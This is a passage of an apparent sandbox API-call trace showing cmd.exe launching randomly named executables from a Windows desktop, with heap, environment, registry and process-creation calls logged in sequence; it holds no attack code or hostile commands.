[0211.118] GetProcessHeap () returned 0x36a0000 [0211.118] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0xe0) returned 0x36a7e00 [0211.120] GetProcessHeap () returned 0x36a0000 [0211.120] RtlReAllocateHeap (Heap=0x36a0000, Flags=0x0, Ptr=0x36a7e00, Size=0x76) returned 0x36a7e00 [0211.120] GetProcessHeap () returned 0x36a0000 [0211.120] RtlSizeHeap (HeapHandle=0x36a0000, Flags=0x0, MemoryPointer=0x36a7e00) returned 0x76 [0211.121] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.122] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\qq3d1t429055.exe", fInfoLevelId=0x1, lpFindFileData=0x32ff0e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ff0e8) returned 0x36a7e80 [0211.122] GetProcessHeap () returned 0x36a0000 [0211.122] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x0, Size=0x14) returned 0x36a4528 [0211.122] FindClose (in: hFindFile=0x36a7e80 | out: hFindFile=0x36a7e80) returned 1 [0211.122] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0211.122] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0211.123] ??_V@YAXPAX@Z () returned 0x1 [0211.123] GetConsoleTitleW (in: lpConsoleTitle=0x32ff5cc, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0211.629] InitializeProcThreadAttributeList (in: lpAttributeList=0x32ff4f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32ff4e4 | out: lpAttributeList=0x32ff4f8, lpSize=0x32ff4e4) returned 1 [0211.629] UpdateProcThreadAttribute (in: lpAttributeList=0x32ff4f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x32ff4e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32ff4f8, lpPreviousValue=0x0) returned 1 [0211.629] GetStartupInfoW (in: lpStartupInfo=0x32ff530 | out: lpStartupInfo=0x32ff530*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x8c, hStdOutput=0x3d8, hStdError=0x474)) [0211.630] GetProcessHeap () returned 0x36a0000 [0211.630] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0x18) returned 0x36a7e80 [0211.630] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0211.630] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0211.630] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0211.630] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0211.630] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0211.631] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0211.631] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0211.631] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0211.631] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0211.631] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0211.631] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0211.632] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0211.633] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0211.634] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0211.634] GetProcessHeap () returned 0x36a0000 [0211.634] RtlFreeHeap (HeapHandle=0x36a0000, Flags=0x0, BaseAddress=0x36a7e80) returned 1 [0211.634] GetProcessHeap () returned 0x36a0000 [0211.634] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0xa) returned 0x36a7e80 [0211.634] lstrcmpW (lpString1="\\qq3d1t429055.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.637] _get_osfhandle (_FileHandle=1) returned 0x3d8 [0211.637] SetConsoleMode (hConsoleHandle=0x3d8, dwMode=0x0) returned 0 [0211.638] _get_osfhandle (_FileHandle=0) returned 0x8c [0211.638] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0211.890] CreateProcessW (in: lpApplicationName="C:\\Users\\FD1HVy\\Desktop\\qq3d1t429055.exe", lpCommandLine="qq3d1t429055.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x32ff480*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="qq3d1t429055.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32ff4cc | out: lpCommandLine="qq3d1t429055.exe", lpProcessInformation=0x32ff4cc*(hProcess=0xd8, hThread=0xd4, dwProcessId=0x118c, dwThreadId=0x13c8)) returned 1 [0211.957] CloseHandle (hObject=0xd4) returned 1 [0211.957] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.957] GetProcessHeap () returned 0x36a0000 [0211.958] RtlFreeHeap (HeapHandle=0x36a0000, Flags=0x0, BaseAddress=0x36a6ca8) returned 1 [0211.958] GetEnvironmentStringsW () returned 0x36a6ca8* [0211.958] GetProcessHeap () returned 0x36a0000 [0211.958] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0xb1a) returned 0x36a4c20 [0211.958] FreeEnvironmentStringsA (penv="=") returned 1 [0211.958] WaitForSingleObject (hHandle=0xd8, dwMilliseconds=0xffffffff) returned 0x0 [0239.326] GetExitCodeProcess (in: hProcess=0xd8, lpExitCode=0x32ff464 | out: lpExitCode=0x32ff464*=0x0) returned 1 [0239.327] CloseHandle (hObject=0xd8) returned 1 [0239.328] _vsnwprintf (in: _Buffer=0x32ff54c, _BufferCount=0x13, _Format="%08X", _ArgList=0x32ff46c | out: _Buffer="00000000") returned 8 [0239.330] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0239.333] GetProcessHeap () returned 0x36a0000 [0239.333] RtlFreeHeap (HeapHandle=0x36a0000, Flags=0x0, BaseAddress=0x36a4c20) returned 1 [0239.333] GetEnvironmentStringsW () returned 0x36a7fe0* [0239.333] GetProcessHeap () returned 0x36a0000 [0239.333] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0xb40) returned 0x36a4c20 [0239.334] FreeEnvironmentStringsA (penv="=") returned 1 [0239.334] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0239.334] GetProcessHeap () returned 0x36a0000 [0239.334] RtlFreeHeap (HeapHandle=0x36a0000, Flags=0x0, BaseAddress=0x36a4c20) returned 1 [0239.334] GetEnvironmentStringsW () returned 0x36a7fe0* [0239.334] GetProcessHeap () returned 0x36a0000 [0239.334] RtlAllocateHeap (HeapHandle=0x36a0000, Flags=0x8, Size=0xb40) returned 0x36a4c20 [0239.334] FreeEnvironmentStringsA (penv="=") returned 1 [0239.335] GetProcessHeap () returned 0x36a0000 [0239.335] RtlFreeHeap (HeapHandle=0x36a0000, Flags=0x0, BaseAddress=0x36a7e80) returned 1 [0239.335] DeleteProcThreadAttributeList (in: lpAttributeList=0x32ff4f8 | out: lpAttributeList=0x32ff4f8) [0239.335] ??_V@YAXPAX@Z () returned 0x1 [0239.335] _get_osfhandle (_FileHandle=1) returned 0x3d8 [0239.336] SetConsoleMode (hConsoleHandle=0x3d8, dwMode=0x0) returned 0 [0239.336] _get_osfhandle (_FileHandle=1) returned 0x3d8 [0239.336] GetConsoleMode (in: hConsoleHandle=0x3d8, lpMode=0xf03890 | out: lpMode=0xf03890) returned 0 [0239.336] _get_osfhandle (_FileHandle=0) returned 0x8c [0239.336] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03894 | out: lpMode=0xf03894) returned 1 [0240.124] _get_osfhandle (_FileHandle=0) returned 0x8c [0240.124] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0240.517] SetConsoleInputExeNameW () returned 0x1 [0240.517] GetConsoleOutputCP () returned 0x1b5 [0241.437] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0241.438] SetThreadUILanguage (LangId=0x0) returned 0x3080409 [0242.220] exit (_Code=0) [0242.222] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 159 os_tid = 0x13ec Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1ffe4000" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1224" cmd_line = "\"cmd.exe\" /c onc2pn4u4214.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 150 os_tid = 0xfa8 [0206.840] GetModuleHandleA (lpModuleName=0x0) returned 0xed0000 [0206.840] __set_app_type (_Type=0x1) [0206.840] __p__fmode () returned 0x74ff3c14 [0206.840] __p__commode () returned 0x74ff49ec [0206.841] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xee6fd0) returned 0x0 [0206.841] __getmainargs (in: _Argc=0xefd1a4, _Argv=0xefd1a8, _Env=0xefd1ac, _DoWildCard=0, _StartInfo=0xefd1b8 | out: _Argc=0xefd1a4, _Argv=0xefd1a8, _Env=0xefd1ac) returned 0 [0206.841] _onexit (_Func=0xee8030) returned 0xee8030 [0206.842] _onexit (_Func=0xee8040) returned 0xee8040 [0206.842] _onexit (_Func=0xee8050) returned 0xee8050 [0206.843] _onexit (_Func=0xee8060) returned 0xee8060 [0207.014] _onexit (_Func=0xee8070) returned 0xee8070 [0207.016] _onexit (_Func=0xee8080) returned 0xee8080 [0207.016] GetCurrentThreadId () returned 0xfa8 [0207.017] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfa8) returned 0xb4 [0207.017] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x73b80000 [0207.018] GetProcAddress (hModule=0x73b80000, lpProcName="SetThreadUILanguage") returned 0x73b94f70 [0207.019] SetThreadUILanguage (LangId=0x0) returned 0x30c0409 [0207.576] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.576] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32ffdd4 | out: phkResult=0x32ffdd4*=0x0) returned 0x2 [0207.577] VirtualQuery (in: lpAddress=0x32ffddf, lpBuffer=0x32ffd8c, dwLength=0x1c | out: lpBuffer=0x32ffd8c*(BaseAddress=0x32ff000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.577] VirtualQuery (in: lpAddress=0x3200000, lpBuffer=0x32ffd8c, dwLength=0x1c | out: lpBuffer=0x32ffd8c*(BaseAddress=0x3200000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0207.577] VirtualQuery (in: lpAddress=0x3201000, lpBuffer=0x32ffd8c, dwLength=0x1c | out: lpBuffer=0x32ffd8c*(BaseAddress=0x3201000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0207.577] VirtualQuery (in: lpAddress=0x3203000, lpBuffer=0x32ffd8c, dwLength=0x1c | out: lpBuffer=0x32ffd8c*(BaseAddress=0x3203000, AllocationBase=0x3200000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.577] VirtualQuery (in: lpAddress=0x3300000, lpBuffer=0x32ffd8c, dwLength=0x1c | out: lpBuffer=0x32ffd8c*(BaseAddress=0x3300000, AllocationBase=0x3300000, AllocationProtect=0x4, RegionSize=0x35000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0207.577] GetConsoleOutputCP () returned 0x1b5 [0207.954] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0207.955] SetConsoleCtrlHandler (HandlerRoutine=0xef7260, Add=1) returned 1 [0207.955] _get_osfhandle (_FileHandle=1) returned 0x3d8 [0207.955] GetConsoleMode (in: hConsoleHandle=0x3d8, lpMode=0xf0388c | out: lpMode=0xf0388c) returned 0 [0207.955] _get_osfhandle (_FileHandle=0) returned 0x8c [0207.955] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03888 | out: lpMode=0xf03888) returned 1 [0208.453] _get_osfhandle (_FileHandle=1) returned 0x3d8 [0208.453] SetConsoleMode (hConsoleHandle=0x3d8, dwMode=0x0) returned 0 [0208.454] _get_osfhandle (_FileHandle=1) returned 0x3d8 [0208.454] GetConsoleMode (in: hConsoleHandle=0x3d8, lpMode=0xf03890 | out: lpMode=0xf03890) returned 0 [0208.454] _get_osfhandle (_FileHandle=0) returned 0x8c [0208.454] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03894 | out: lpMode=0xf03894) returned 1 [0209.438] _get_osfhandle (_FileHandle=0) returned 0x8c [0209.438] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0209.829] GetEnvironmentStringsW () returned 0x3344c20* [0209.829] GetProcessHeap () returned 0x3340000 [0209.829] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0xaca) returned 0x33456f8 [0209.829] FreeEnvironmentStringsA (penv="A") returned 1 [0209.829] GetProcessHeap () returned 0x3340000 [0209.829] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x4) returned 0x33446d8 [0209.830] GetEnvironmentStringsW () returned 0x3344c20* [0209.830] GetProcessHeap () returned 0x3340000 [0209.830] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0xaca) returned 0x33461d0 [0209.830] FreeEnvironmentStringsA (penv="A") returned 1 [0209.830] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32fed30 | out: phkResult=0x32fed30*=0xc4) returned 0x0 [0209.830] RegQueryValueExW (in: hKey=0xc4, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x0, lpData=0x32fed3c*=0x0, lpcbData=0x32fed34*=0x1000) returned 0x2 [0209.830] RegQueryValueExW (in: hKey=0xc4, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x4, lpData=0x32fed3c*=0x1, lpcbData=0x32fed34*=0x4) returned 0x0 [0209.830] RegQueryValueExW (in: hKey=0xc4, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x0, lpData=0x32fed3c*=0x1, lpcbData=0x32fed34*=0x1000) returned 0x2 [0209.830] RegQueryValueExW (in: hKey=0xc4, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x4, lpData=0x32fed3c*=0x0, lpcbData=0x32fed34*=0x4) returned 0x0 [0209.830] RegQueryValueExW (in: hKey=0xc4, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x4, lpData=0x32fed3c*=0x40, lpcbData=0x32fed34*=0x4) returned 0x0 [0209.830] RegQueryValueExW (in: hKey=0xc4, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x4, lpData=0x32fed3c*=0x40, lpcbData=0x32fed34*=0x4) returned 0x0 [0209.830] RegQueryValueExW (in: hKey=0xc4, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x0, lpData=0x32fed3c*=0x40, lpcbData=0x32fed34*=0x1000) returned 0x2 [0209.831] RegCloseKey (hKey=0xc4) returned 0x0 [0209.831] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32fed30 | out: phkResult=0x32fed30*=0xc4) returned 0x0 [0209.831] RegQueryValueExW (in: hKey=0xc4, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x0, lpData=0x32fed3c*=0x40, lpcbData=0x32fed34*=0x1000) returned 0x2 [0209.831] RegQueryValueExW (in: hKey=0xc4, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x4, lpData=0x32fed3c*=0x1, lpcbData=0x32fed34*=0x4) returned 0x0 [0209.831] RegQueryValueExW (in: hKey=0xc4, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x0, lpData=0x32fed3c*=0x1, lpcbData=0x32fed34*=0x1000) returned 0x2 [0209.831] RegQueryValueExW (in: hKey=0xc4, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x4, lpData=0x32fed3c*=0x0, lpcbData=0x32fed34*=0x4) returned 0x0 [0209.832] RegQueryValueExW (in: hKey=0xc4, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x4, lpData=0x32fed3c*=0x9, lpcbData=0x32fed34*=0x4) returned 0x0 [0209.832] RegQueryValueExW (in: hKey=0xc4, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x4, lpData=0x32fed3c*=0x9, lpcbData=0x32fed34*=0x4) returned 0x0 [0209.832] RegQueryValueExW (in: hKey=0xc4, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32fed38, lpData=0x32fed3c, lpcbData=0x32fed34*=0x1000 | out: lpType=0x32fed38*=0x0, lpData=0x32fed3c*=0x9, lpcbData=0x32fed34*=0x1000) returned 0x2 [0209.832] RegCloseKey (hKey=0xc4) returned 0x0 [0209.832] time (in: timer=0x0 | out: timer=0x0) returned 0x5e578f7d [0209.832] srand (_Seed=0x5e578f7d) [0209.832] GetCommandLineW () returned="\"cmd.exe\" /c onc2pn4u4214.exe" [0209.833] malloc (_Size=0x4000) returned 0x37c21f0 [0209.834] GetCommandLineW () returned="\"cmd.exe\" /c onc2pn4u4214.exe" [0209.834] malloc (_Size=0xffce) returned 0x37d0048 [0209.835] ??_V@YAXPAX@Z () returned 0x32ffd14 [0209.837] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x37d0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0209.837] malloc (_Size=0xffce) returned 0x37e0020 [0209.838] ??_V@YAXPAX@Z () returned 0x32ffae8 [0209.839] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x37e0020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0209.840] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0209.840] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.840] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0209.840] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0209.840] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0209.840] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0209.841] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0209.841] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0209.841] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0209.841] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0209.841] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0209.841] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0209.841] GetProcessHeap () returned 0x3340000 [0209.842] RtlFreeHeap (HeapHandle=0x3340000, Flags=0x0, BaseAddress=0x33456f8) returned 1 [0209.842] GetEnvironmentStringsW () returned 0x3344c20* [0209.842] GetProcessHeap () returned 0x3340000 [0209.842] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0xae2) returned 0x3347798 [0209.842] FreeEnvironmentStringsA (penv="A") returned 1 [0209.842] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0209.842] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0209.843] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0209.843] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0209.843] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0209.843] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0209.843] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0209.843] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0209.843] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0209.843] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0209.843] malloc (_Size=0xffce) returned 0x37efff8 [0209.846] ??_V@YAXPAX@Z () returned 0x32ff880 [0209.847] GetProcessHeap () returned 0x3340000 [0209.847] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x38) returned 0x3344770 [0209.847] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x37efff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0209.848] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x37efff8, lpFilePart=0x32ff8cc | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x32ff8cc*="Desktop") returned 0x17 [0209.849] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0209.850] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32ff650 | out: lpFindFileData=0x32ff650*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x33447b0 [0209.850] FindClose (in: hFindFile=0x33447b0 | out: hFindFile=0x33447b0) returned 1 [0209.850] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x32ff650 | out: lpFindFileData=0x32ff650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x33447b0 [0209.851] FindClose (in: hFindFile=0x33447b0 | out: hFindFile=0x33447b0) returned 1 [0209.851] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x32ff650 | out: lpFindFileData=0x32ff650*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, 